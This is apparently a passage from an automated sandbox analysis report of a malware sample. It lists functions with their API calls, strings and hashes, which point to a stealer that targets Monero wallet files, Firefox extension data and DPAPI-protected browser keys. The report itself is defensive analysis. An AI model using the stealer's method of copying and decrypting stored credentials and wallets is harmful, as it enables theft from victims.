                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                              • Instruction ID: c7e0a861ac91e5bf3000c6a050531de0fce3c7edb0353227afabb7b877ee9b7e
                              • Opcode Fuzzy Hash: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                              • Instruction Fuzzy Hash: AE211FB1E40208AFDB04DFD4DD49FAEBBB9FB48715F104119F605A7680C779A901CBA1
                              Function 00698D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0069951E,00000000), ref: 00698D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00698D62
                              • wsprintfW.USER32 ref: 00698D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                              • Instruction ID: f77331d54b21838d2b694f741d87e0fbb8019874457826e66a74c1c162caddb9
                              • Opcode Fuzzy Hash: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                              • Instruction Fuzzy Hash: 2FE08CB0A4020CBBDB04DB94DC0AE6977B8FB0470AF0000A4FD0987280DA719E008B96
                              Function 0068A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 0068A3FF
                              • lstrlen.KERNEL32(00000000), ref: 0068A6BC
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 0068A743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                              • Instruction ID: 99e52da9a13297e65049025ac139a5642b0256025dab14e38f67b2e43a574610
                              • Opcode Fuzzy Hash: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                              • Instruction Fuzzy Hash: E8E1DC728201189ADF48FBE4DD92EEE737EBF14300F50815DF51676491EE306A49CBAA
                              Function 0068D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D481
                              • lstrlen.KERNEL32(00000000), ref: 0068D698
                              • lstrlen.KERNEL32(00000000), ref: 0068D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0068D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                              • Instruction ID: 5a3d46461ca49818272ea98771e230742dd12d1102323d2031f524f3e6c13d45
                              • Opcode Fuzzy Hash: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                              • Instruction Fuzzy Hash: 8191FE718201189BDF48FBE4DD96DEE73BEBF14300F50416DF50666491EE346A09CBAA
                              Function 0068D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D801
                              • lstrlen.KERNEL32(00000000), ref: 0068D99F
                              • lstrlen.KERNEL32(00000000), ref: 0068D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0068DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                              • Instruction ID: ea3d857fbf0bec98a202f9d59b54e6732cb1ebe7a81ed805ebd2eed1e91c5a05
                              • Opcode Fuzzy Hash: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                              • Instruction Fuzzy Hash: 6881FF719201189BDF48FBE4DD96DEE73BEBF14300F50412DF406A6491EE346A09CBAA
                              Function 0068F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006A1580,006A0D92), ref: 0068F54C
                              • lstrlen.KERNEL32(00000000), ref: 0068F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 215f97cc63341f50b2e8cb448e480d4a27fb02a2d11b6bdf5159a575cad58f91
                              • Instruction ID: 5a20ceed1fdc80165cd5046e15528fe4730839462d42d92e7a25dc4f71960a1d
                              • Opcode Fuzzy Hash: 215f97cc63341f50b2e8cb448e480d4a27fb02a2d11b6bdf5159a575cad58f91
                              • Instruction Fuzzy Hash: CD51EA75D10108AADF44FBE0DD96DED73BEAF54300F40852CF816A6591EE346A09CBEA
                              Function 006970D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                              Download Yara Rule
                              Strings
                              • si, xrefs: 00697111
                              • si, xrefs: 006972AE, 00697179, 0069717C
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0069718C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: si$si$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 3722407311-4068855434
                              • Opcode ID: d14b0cd1559fec51a1655638cbcaca02d332afdf69c262574f0fb8940ef8be88
                              • Instruction ID: 376f03965e019f8d8290ec4f0c6a3b6fbcd33d49d7f34d095bad99e2a6c37821
                              • Opcode Fuzzy Hash: d14b0cd1559fec51a1655638cbcaca02d332afdf69c262574f0fb8940ef8be88
                              • Instruction Fuzzy Hash: E3518EB0C142189BDF54EB90DD85BEEB3BAAF44304F2440ADE60567681EB746E88CF59
                              Function 00693560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: bcdc6ec4fa8068323f6b112ec06c3fbb2f3c7761d71a6782c02a131a4897965b
                              • Instruction ID: 3db86b77fa47a8f87b70ba3756186eaa4a4b9746e88ce31292f44716f8b864d5
                              • Opcode Fuzzy Hash: bcdc6ec4fa8068323f6b112ec06c3fbb2f3c7761d71a6782c02a131a4897965b
                              • Instruction Fuzzy Hash: 2B412D75D10109AFDF04EFE4D845AFEB7BAAB44304F008418E51677790EB75AA06CFA6
                              Function 00689CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                                • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                                • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                                • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                                • Part of subcall function 00689B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                                • Part of subcall function 00689B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                                • Part of subcall function 00689B60: LocalFree.KERNEL32(?), ref: 00689BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 3012cb93d3b593d60d6b6c7098ee0865cb4a29e27646c4bf87b2d91c201bfc1f
                              • Instruction ID: 66a7373134b93c6c63e104bc06380b23baba049247e67d63bae9399073fcaca5
                              • Opcode Fuzzy Hash: 3012cb93d3b593d60d6b6c7098ee0865cb4a29e27646c4bf87b2d91c201bfc1f
                              • Instruction Fuzzy Hash: C73110B5D10109EBCF04EBE4DC85AFFB7BABF48304F184619E905A7241E7349A44CBA5
                              Function 00698680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006A05B7), ref: 006986CA
